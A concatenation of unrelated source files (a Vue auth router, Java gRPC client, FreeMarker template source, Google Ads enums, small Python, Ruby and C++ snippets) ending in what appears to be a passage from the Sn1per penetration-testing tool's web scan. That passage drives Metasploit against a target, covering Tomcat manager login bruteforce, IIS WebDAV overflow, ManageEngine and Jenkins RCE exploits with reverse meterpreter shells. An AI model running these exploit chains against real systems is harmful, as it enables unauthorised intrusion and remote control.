import Amplify, * as AmplifyModules from 'aws-amplify'; // eslint-disable-line
import {AmplifyPlugin} from 'aws-amplify-vue';
import AmplifyStore from '../store/store';
Vue.use(Router);
Vue.use(AmplifyPlugin, AmplifyModules);
let user;
getUser().then((user) => {
if (user) {
router.push({path: '/'})
}
})
AmplifyEventBus.$on('authState', async (state) => {
console.log(state) // eslint-disable-line
if (state === 'signedOut') {
user = null;
AmplifyStore.commit('setUser', null);
router.push({path: '/auth'})
} else if (state === 'signedIn') {
user = await getUser();
router.push({path: '/'})
}
});
function getUser() {
return Vue.prototype.$Amplify.Auth.currentAuthenticatedUser().then((data) => {
if (data && data.signInUserSession) {
AmplifyStore.commit('setUser', data);
return data;
}
}).catch((e) => { // eslint-disable-line
AmplifyStore.commit('setUser', null);
return null
});
}
const router = new Router({
routes: [
{
path: '/',
name: 'Home',
component: BroadcastMonitor,
meta: {requiresAuth: true}
},
{
path: '/auth',
name: 'Authenticator',
component: Signin
}
]
});
router.beforeResolve(async (to, from, next) => {
if (to.matched.some(record => record.meta.requiresAuth)) {
user = await getUser();
if (!user) {
return next({
path: '/auth',
query: {
redirect: to.fullPath,
}
});
}
return next()
}
return next()
})
export default router
|
def find_min_shares_stock(portfolio):
min_shares_stock = min(portfolio, key=lambda x: x['shares'])
return min_shares_stock['name']
|
import subprocess
# placeholder
|
#!/bin/bash -e
################################################################################
## File: oc.sh
## Desc: Installs the OC CLI
################################################################################
source $HELPER_SCRIPTS/install.sh
# Install the oc CLI
DOWNLOAD_URL="https://mirror.openshift.com/pub/openshift-v4/clients/ocp/latest/openshift-client-linux.tar.gz"
PACKAGE_TAR_NAME="oc.tar.gz"
download_with_retries $DOWNLOAD_URL "/tmp" $PACKAGE_TAR_NAME
tar xvzf "/tmp/$PACKAGE_TAR_NAME" -C "/usr/local/bin"
# Validate the installation
echo "Validate the installation"
if ! command -v oc; then
echo "oc was not installed"
exit 1
fi
|
<head>
<title>My Title</title>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
</head>
|
<reponame>itsNikolay/dry-configurable
# A collection of micro-libraries, each intended to encapsulate
# a common task in Ruby
module Dry
module Configurable
Error = Class.new(::StandardError)
AlreadyDefinedConfigError = ::Class.new(Error)
FrozenConfigError = ::Class.new(Error)
NotConfiguredError = ::Class.new(Error)
end
end
|
import os
def simulate_setns(fd):
# Open the file descriptor to the namespace
ns_fd = os.open(f"/proc/self/fd/{fd}", os.O_RDONLY)
# Call the setns syscall to associate the calling process with the namespace
os.setns(ns_fd, os.CLONE_NEWNET) # Example: CLONE_NEWNET for network namespace
# Close the file descriptor after associating with the namespace
os.close(ns_fd)
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package freemarker.cache;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.net.JarURLConnection;
import java.net.URL;
import java.net.URLConnection;
/**
* Wraps a <code>java.net.URL</code>, and implements methods required for a typical template source.
*/
class URLTemplateSource {
private final URL url;
private URLConnection conn;
private InputStream inputStream;
private Boolean useCaches;
/**
* @param useCaches {@code null} if this aspect wasn't set in the parent {@link TemplateLoader}.
*/
URLTemplateSource(URL url, Boolean useCaches) throws IOException {
this.url = url;
this.conn = url.openConnection();
this.useCaches = useCaches;
if (useCaches != null) {
conn.setUseCaches(useCaches.booleanValue());
}
}
@Override
public boolean equals(Object o) {
if (o instanceof URLTemplateSource) {
return url.equals(((URLTemplateSource) o).url);
} else {
return false;
}
}
@Override
public int hashCode() {
return url.hashCode();
}
@Override
public String toString() {
return url.toString();
}
long lastModified() {
if (conn instanceof JarURLConnection) {
// There is a bug in sun's jar url connection that causes file handle leaks when calling getLastModified()
// Since the time stamps of jar file contents can't vary independent from the jar file timestamp, just use
// the jar file timestamp
URL jarURL = ((JarURLConnection) conn).getJarFileURL();
if (jarURL.getProtocol().equals("file")) {
// Return the last modified time of the underlying file - saves some opening and closing
return new File(jarURL.getFile()).lastModified();
} else {
// Use the URL mechanism
URLConnection jarConn = null;
try {
jarConn = jarURL.openConnection();
return jarConn.getLastModified();
} catch (IOException e) {
return -1;
} finally {
try {
if (jarConn != null) jarConn.getInputStream().close();
} catch (IOException e) { }
}
}
} else {
long lastModified = conn.getLastModified();
if (lastModified == -1L && url.getProtocol().equals("file")) {
// Hack for obtaining accurate last modified time for
// URLs that point to the local file system. This is fixed
// in JDK 1.4, but prior JDKs returns -1 for file:// URLs.
return new File(url.getFile()).lastModified();
} else {
return lastModified;
}
}
}
InputStream getInputStream() throws IOException {
if (inputStream != null) {
// Ensure that the returned InputStream reads from the beginning of the resource when getInputStream()
// is called for the second time:
try {
inputStream.close();
} catch (IOException e) {
// Ignore; this is maybe because it was closed for the 2nd time now
}
this.conn = url.openConnection();
}
inputStream = conn.getInputStream();
return inputStream;
}
void close() throws IOException {
try {
if (inputStream != null) {
inputStream.close();
} else {
conn.getInputStream().close();
}
} finally {
inputStream = null;
conn = null;
}
}
Boolean getUseCaches() {
return useCaches;
}
void setUseCaches(boolean useCaches) {
if (this.conn != null) {
conn.setUseCaches(useCaches);
this.useCaches = Boolean.valueOf(useCaches);
}
}
}
|
# frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Ads
module GoogleAds
module V8
module Enums
# Describes the input type of a lead form field.
class LeadFormFieldUserInputTypeEnum
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# Enum describing the input type of a lead form field.
module LeadFormFieldUserInputType
# Not specified.
UNSPECIFIED = 0
# Used for return value only. Represents value unknown in this version.
UNKNOWN = 1
# The user will be asked to fill in their given and family name. This field
# cannot be set at the same time as GIVEN_NAME or FAMILY_NAME.
FULL_NAME = 2
# The user will be asked to fill in their email address.
EMAIL = 3
# The user will be asked to fill in their phone number.
PHONE_NUMBER = 4
# The user will be asked to fill in their zip code.
POSTAL_CODE = 5
# The user will be asked to fill in their city.
CITY = 9
# The user will be asked to fill in their region part of the address (e.g.
# state for US, province for Canada).
REGION = 10
# The user will be asked to fill in their country.
COUNTRY = 11
# The user will be asked to fill in their work email address.
WORK_EMAIL = 12
# The user will be asked to fill in their company name.
COMPANY_NAME = 13
# The user will be asked to fill in their work phone.
WORK_PHONE = 14
# The user will be asked to fill in their job title.
JOB_TITLE = 15
# The user will be asked to fill in their first name. This
# field can not be set at the same time as FULL_NAME.
FIRST_NAME = 23
# The user will be asked to fill in their last name. This
# field can not be set at the same time as FULL_NAME.
LAST_NAME = 24
# Question: "Which model are you interested in?"
# Category: "Auto"
VEHICLE_MODEL = 1001
# Question: "Which type of vehicle are you interested in?"
# Category: "Auto"
VEHICLE_TYPE = 1002
# Question: "What is your preferred dealership?"
# Category: "Auto"
PREFERRED_DEALERSHIP = 1003
# Question: "When do you plan on purchasing a vehicle?"
# Category: "Auto"
VEHICLE_PURCHASE_TIMELINE = 1004
# Question: "Do you own a vehicle?"
# Category: "Auto"
VEHICLE_OWNERSHIP = 1005
# Question: "What vehicle ownership option are you interested in?"
# Category: "Auto"
VEHICLE_PAYMENT_TYPE = 1009
# Question: "What type of vehicle condition are you interested in?"
# Category: "Auto"
VEHICLE_CONDITION = 1010
# Question: "What size is your company?"
# Category: "Business"
COMPANY_SIZE = 1006
# Question: "What is your annual sales volume?"
# Category: "Business"
ANNUAL_SALES = 1007
# Question: "How many years have you been in business?"
# Category: "Business"
YEARS_IN_BUSINESS = 1008
# Question: "What is your job department?"
# Category: "Business"
JOB_DEPARTMENT = 1011
# Question: "What is your job role?"
# Category: "Business"
JOB_ROLE = 1012
# Question: "Which program are you interested in?"
# Category: "Education"
EDUCATION_PROGRAM = 1013
# Question: "Which course are you interested in?"
# Category: "Education"
EDUCATION_COURSE = 1014
# Question: "Which product are you interested in?"
# Category: "General"
PRODUCT = 1016
# Question: "Which service are you interested in?"
# Category: "General"
SERVICE = 1017
# Question: "Which offer are you interested in?"
# Category: "General"
OFFER = 1018
# Question: "Which category are you interested in?"
# Category: "General"
CATEGORY = 1019
# Question: "What is your preferred method of contact?"
# Category: "General"
PREFERRED_CONTACT_METHOD = 1020
# Question: "What is your preferred location?"
# Category: "General"
PREFERRED_LOCATION = 1021
# Question: "What is the best time to contact you?"
# Category: "General"
PREFERRED_CONTACT_TIME = 1022
# Question: "When are you looking to make a purchase?"
# Category: "General"
PURCHASE_TIMELINE = 1023
# Question: "How many years of work experience do you have?"
# Category: "Jobs"
YEARS_OF_EXPERIENCE = 1048
# Question: "What industry do you work in?"
# Category: "Jobs"
JOB_INDUSTRY = 1049
# Question: "What is your highest level of education?"
# Category: "Jobs"
LEVEL_OF_EDUCATION = 1050
# Question: "What type of property are you looking for?"
# Category: "Real Estate"
PROPERTY_TYPE = 1024
# Question: "What do you need a realtor's help with?"
# Category: "Real Estate"
REALTOR_HELP_GOAL = 1025
# Question: "What neighborhood are you interested in?"
# Category: "Real Estate"
PROPERTY_COMMUNITY = 1026
# Question: "What price range are you looking for?"
# Category: "Real Estate"
PRICE_RANGE = 1027
# Question: "How many bedrooms are you looking for?"
# Category: "Real Estate"
NUMBER_OF_BEDROOMS = 1028
# Question: "Are you looking for a fully furnished property?"
# Category: "Real Estate"
FURNISHED_PROPERTY = 1029
# Question: "Are you looking for properties that allow pets?"
# Category: "Real Estate"
PETS_ALLOWED_PROPERTY = 1030
# Question: "What is the next product you plan to purchase?"
# Category: "Retail"
NEXT_PLANNED_PURCHASE = 1031
# Question: "Would you like to sign up for an event?"
# Category: "Retail"
EVENT_SIGNUP_INTEREST = 1033
# Question: "Where are you interested in shopping?"
# Category: "Retail"
PREFERRED_SHOPPING_PLACES = 1034
# Question: "What is your favorite brand?"
# Category: "Retail"
FAVORITE_BRAND = 1035
# Question: "Which type of valid commercial license do you have?"
# Category: "Transportation"
TRANSPORTATION_COMMERCIAL_LICENSE_TYPE = 1036
# Question: "Interested in booking an event?"
# Category: "Travel"
EVENT_BOOKING_INTEREST = 1038
# Question: "What is your destination country?"
# Category: "Travel"
DESTINATION_COUNTRY = 1039
# Question: "What is your destination city?"
# Category: "Travel"
DESTINATION_CITY = 1040
# Question: "What is your departure country?"
# Category: "Travel"
DEPARTURE_COUNTRY = 1041
# Question: "What is your departure city?"
# Category: "Travel"
DEPARTURE_CITY = 1042
# Question: "What is your departure date?"
# Category: "Travel"
DEPARTURE_DATE = 1043
# Question: "What is your return date?"
# Category: "Travel"
RETURN_DATE = 1044
# Question: "How many people are you traveling with?"
# Category: "Travel"
NUMBER_OF_TRAVELERS = 1045
# Question: "What is your travel budget?"
# Category: "Travel"
TRAVEL_BUDGET = 1046
# Question: "Where do you want to stay during your travel?"
# Category: "Travel"
TRAVEL_ACCOMMODATION = 1047
end
end
end
end
end
end
end
|
<filename>lang/py/pylib/code/uuid/uuid_uuid_objects.py
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 <NAME> All rights reserved.
#
"""
"""
__version__ = "$Id$"
#end_pymotw_header
import uuid
def show(msg, l):
print msg
for v in l:
print ' ', v
print
input_values = [
'urn:uuid:f2f84497-b3bf-493a-bba9-7c68e6def80b',
'{417a5ebb-01f7-4ed5-aeac-3d56cd5037b0}',
'2115773a-5bf1-11dd-ab48-001ec200d9e0',
]
show('input_values', input_values)
uuids = [ uuid.UUID(s) for s in input_values ]
show('converted to uuids', uuids)
uuids.sort()
show('sorted', uuids)
|
<reponame>tdm1223/Algorithm<gh_stars>1-10
// 9933. 민균이의 비밀번호
// 2019.05.22
// 문자열 처리
#include<iostream>
#include<vector>
#include<string>
#include<algorithm>
using namespace std;
// 문자열 거꾸로
string rev(string &input)
{
string tmp(input);
reverse(tmp.begin(), tmp.end());
return tmp;
}
int main()
{
int n;
cin >> n;
vector<string> v(n);
for (int i = 0; i < n; i++)
{
cin >> v[i];
}
string ans;
// 모든 경우의 수에 대하여 비교. 답은 유일한 경우밖에 없다.
for (int i = 0; i < v.size(); i++)
{
string tmp = rev(v[i]);
for (int j = 0; j < v.size(); j++)
{
if (tmp == v[j])
{
ans = v[i];
break;
}
}
}
// 결과 출력
cout << ans.size() << " " << ans[ans.size() / 2] << endl;
return 0;
}
|
var stgr;
stgr = stgr || {};
stgr.modelBuildr = (function() {
'use strict';
var getData, init, _collateProperties;
init = function(callback) {
if (callback == null) {
callback = function() {};
}
return getData(callback);
};
getData = function(callback) {
var request;
if (callback == null) {
callback = function() {};
}
request = $.ajax({
url: 'http://' + window.location.hostname + ':7847/list?verbose=true'
});
request.done(function(data) {
stgr.model = {
settings: {
lastChange: data.lastChange
},
servers: data.data,
properties: _collateProperties(data.data)
};
return callback();
});
return request.fail(function(data) {
stgr.model = {
settings: {},
servers: {},
properties: {}
};
return callback();
});
};
_collateProperties = function(servers) {
var propertyObj;
propertyObj = {};
_.each(servers, function(serverData, server) {
propertyObj[serverData.property] = propertyObj[serverData.property] || [];
return propertyObj[serverData.property].push(server);
});
return propertyObj;
};
return {
init: init,
getData: getData
};
})();
|
export function clearWorks (state) {
state.active = []
state.inactive = []
}
export function addActive (state, proposal) {
state.active.push(proposal)
}
export function addInactive (state, proposal) {
state.inactive.push(proposal)
}
|
package org.ship.core.vo.engine;
import io.grpc.ManagedChannel;
import io.grpc.ManagedChannelBuilder;
import org.dataship.rpc.DatashipGrpc;
import org.dataship.rpc.Rpc;
import org.ship.core.util.Utils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.concurrent.TimeUnit;
/**
* Created by wx on 2017/5/8.
*/
public class EngineClient {
private static final Logger log = LoggerFactory.getLogger(EngineClient.class);
private final ManagedChannel channel;
private final DatashipGrpc.DatashipBlockingStub blockingStub;
/**
* Construct client connecting to HelloWorld server at {@code host:port}.
* */
public EngineClient(String host, int port) {
this(ManagedChannelBuilder.forAddress(host, port)
// Channels are secure by default (via SSL/TLS). For the example we disable TLS to avoid
// needing certificates.
.usePlaintext());
}
/**
* Construct client for accessing RouteGuide server using the existing channel.
*/
EngineClient(ManagedChannelBuilder<?> channelBuilder) {
channel = channelBuilder.build();
blockingStub = DatashipGrpc.newBlockingStub(channel);
}
public void shutdown() throws InterruptedException {
channel.shutdown().awaitTermination(5, TimeUnit.SECONDS);
}
public Rpc.OpResult addRule(ConnRule rule) {
Rpc.PbRule pbRule = Rpc.PbRule.newBuilder().setId(rule.getId())
.setType(Rpc.RuleType.forNumber(rule.getRuleType().getValue()))
.setListenAddr(rule.getListenAddr().getIp())
.setListenPort(rule.getListenPort())
.setDstAddr(rule.getDstAddr())
.setDstPort(rule.getDstPort())
.setSendAddr(rule.getSendAddr().getIp())
.build();
return blockingStub.addRule(pbRule);
}
public Rpc.OpResult delRule(ConnRule rule) {
Rpc.PbRule pbRule = Rpc.PbRule.newBuilder().setId(rule.getId())
.setType(Rpc.RuleType.forNumber(rule.getRuleType().getValue()))
.setListenAddr(rule.getListenAddr().getIp())
.setListenPort(rule.getListenPort())
.setDstAddr(rule.getDstAddr())
.setDstPort(rule.getDstPort())
.setSendAddr(rule.getSendAddr().getIp())
.build();
return blockingStub.delRule(pbRule);
}
public Rpc.OpResult addAddr(IpAddress ipAddress) {
log.debug("ipaddr:{}", ipAddress);
int mask = Utils.shiftMask(ipAddress.getMask());
Rpc.PbAddr pbAddr = Rpc.PbAddr.newBuilder().setIface(ipAddress.getIfaceName())
.setIp(ipAddress.getIp())
.setMask(mask)
.build();
return blockingStub.addAddr(pbAddr);
}
public Rpc.OpResult modAddr(IpAddress oldAddr, IpAddress newAddr) {
int old_mask = Utils.shiftMask(oldAddr.getMask());
int new_mask = Utils.shiftMask(newAddr.getMask());
Rpc.PbAddr odl_addr = Rpc.PbAddr.newBuilder()
.setIface(oldAddr.getIfaceName())
.setIp(oldAddr.getIp())
.setMask(old_mask)
.build();
Rpc.PbAddr new_addr = Rpc.PbAddr.newBuilder()
.setIface(newAddr.getIfaceName())
.setIp(newAddr.getIp())
.setMask(new_mask)
.build();
Rpc.PbAddrMod pbAddrMod = Rpc.PbAddrMod.newBuilder()
.setOld(odl_addr)
.setNew(new_addr)
.build();
return blockingStub.modAddr(pbAddrMod);
}
public Rpc.OpResult delAddr(IpAddress ipAddress) {
int mask = Utils.shiftMask(ipAddress.getMask());
Rpc.PbAddr pbAddr = Rpc.PbAddr.newBuilder()
.setIface(ipAddress.getIfaceName())
.setIp(ipAddress.getIp())
.setMask(mask)
.build();
return blockingStub.delAddr(pbAddr);
}
public Rpc.OpResult addRoute(Route route) {
int dst_mask = Utils.shiftMask(route.getDstMask());
Rpc.PbRoute pbRoute = Rpc.PbRoute.newBuilder()
.setDstNet(route.getDstNet())
.setDstMask(dst_mask)
.setIface(route.getIfaceName())
.setGateway(route.getGateway())
.build();
return blockingStub.addRoute(pbRoute);
}
public Rpc.OpResult modRoute(Route oldRoute, Route newRoute) {
int old_dst_mask = Utils.shiftMask(oldRoute.getDstMask());
int new_dst_mask = Utils.shiftMask(newRoute.getDstMask());
Rpc.PbRoute old_pb_route = Rpc.PbRoute.newBuilder()
.setDstNet(oldRoute.getDstNet())
.setDstMask(old_dst_mask)
.setIface(oldRoute.getIfaceName())
.setGateway(oldRoute.getGateway())
.build();
Rpc.PbRoute new_pb_route = Rpc.PbRoute.newBuilder()
.setDstNet(newRoute.getDstNet())
.setDstMask(new_dst_mask)
.setIface(newRoute.getIfaceName())
.setGateway(newRoute.getGateway())
.build();
Rpc.PbRouteMod pbRouteMod = Rpc.PbRouteMod.newBuilder()
.setOld(old_pb_route)
.setNew(new_pb_route)
.build();
return blockingStub.modRoute(pbRouteMod);
}
public Rpc.OpResult delRoute(Route route) {
int dst_mask = Utils.shiftMask(route.getDstMask());
Rpc.PbRoute pbRoute = Rpc.PbRoute.newBuilder()
.setDstNet(route.getDstNet())
.setDstMask(dst_mask)
.setIface(route.getIfaceName())
.setGateway(route.getGateway())
.build();
return blockingStub.delRoute(pbRoute);
}
}
|
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JBOSS VULN SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/jboss_vulnscan; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING MANAGEENGINE DESKTOP CENTRAL RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/windows/http/manageengine_connectionid_write; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT ENUMERATION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/tomcat_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT MANAGER LOGIN BRUTEFORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/http/tomcat_mgr_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JENKINS ENUMERATION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JENKINS SCRIPT CONSOLE RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use multi/http/jenkins_script_console; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; setg SSL "$SSL"; set TARGET 0; run; set TARGETURI /; run; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set TARGET 1; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGET 2; set PAYLOAD linux/x64/meterpreter/reverse_tcp; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGETURI /; run; set TARGET 1; run; set TARGET 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
